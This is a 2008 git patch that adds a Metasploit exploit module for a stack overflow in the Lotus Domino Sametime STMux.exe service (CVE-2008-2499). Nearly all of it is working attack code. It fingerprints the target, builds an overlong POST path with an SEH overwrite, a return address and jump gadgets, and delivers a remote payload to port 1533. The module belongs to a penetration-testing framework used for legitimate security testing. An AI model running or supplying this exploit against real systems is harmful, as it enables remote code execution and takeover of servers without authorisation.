From e14bf65099cdbc75c2fc7777b4703a101958e416 Mon Sep 17 00:00:00 2001 From: Patrick Webster Date: Fri, 14 Nov 2008 11:04:33 +0000 Subject: [PATCH] Added domino_sametime_stmux module. git-svn-id: file:///home/svn/framework3/trunk@5919 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/lotus/domino_sametime_stmux.rb | 120 ++++++++++++++++++ 1 file changed, 120 insertions(+) create mode 100644 modules/exploits/windows/lotus/domino_sametime_stmux.rb diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb new file mode 100644 index 0000000000..1bfb4e398d --- /dev/null +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -0,0 +1,120 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Lotus Domino Sametime STMux.exe Stack Overflow', + 'Description' => %q{ + This module exploits a stack overflow in Lotus Domino's Sametime + Server. By sending an overly long POST request to the Multiplexer + STMux.exe service we are able to overwrite SEH. Based on the exploit + by Manuel Santamarina Suarez. + }, + 'Author' => 'patrick', + 'Arch' => [ ARCH_X86 ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'BID', '29328' ], + [ 'CVE', '2008-2499' ], + [ 'OSVDB', '45610' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x0a\x0d", + 'StackAdjustment' => -3500, + }, + 'Platform' => ['win'], + 'Targets' => + [ + # Patrick - Tested OK against Windows 2003 SP1 20081114 + [ 'Lotus Sametime 7.5 on Windows Server 2000', { 'Ret' => 0x7c3410c2, 'Offset' => 268 } ], # pop ecx, pop exc, ret msvcr71.dll + [ 'Lotus Sametime 7.5 on Windows Server 2003', { 'Ret' => 0x7c3410c2, 'Offset' => 269 } ], # pop ecx, pop exc, ret msvcr71.dll + ], + 'DisclosureDate' => 'Dec 27 2004', # + 'DefaultTarget' => 1)) + + register_options( + [ + Opt::RPORT(1533), + ], self.class) + end + + def check + connect + + req = "HEAD / HTTP/1.0\r\n\r\n" + req << "User-Agent: Sametime Community Agent\r\n" + req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" + sock.put(req) + res = sock.get_once(-1,3) + + disconnect + + if (res =~/Lotus-Domino/) + connect + + req = "GET /CommunityCBR HTTP/1.0\r\n\r\n" + req << "User-Agent: Sametime Community Agent\r\n" + req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" + sock.put(req) + res = sock.get_once(-1,3) + + disconnect + + if (res =~/200 OK/) + return Exploit::CheckCode::Detected + end + end + + return Exploit::CheckCode::Safe + end + + def exploit + connect + + # Patrick - We should use Metasm here. + #popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * 3 + #popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'] + + popad = "\x5b" * 3 + "\x61" * target['Offset'] + "\xff\x24\x24" # pop ebx, popad jmp, dword ptr ss:[esp] + jmp = "\x74\x23" + "\x75\x21" # je short, jnz short + path = "\x66" * 44 + jmp + [target['Ret']].pack('V') + "\x66" * 29 + popad + + req = "POST /CommunityCBR/CC.39.#{path}/\r\n" + req << "User-Agent: Sametime Community Agent\r\n" + req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" + req << "Content-Length: #{payload.encoded.length.to_s}\r\n" + req << "Connection: Close\r\n" + req << "Cache-Control: no-cache\r\n\r\n" + req << payload.encoded + + sock.put(req) + + handler + disconnect + end +end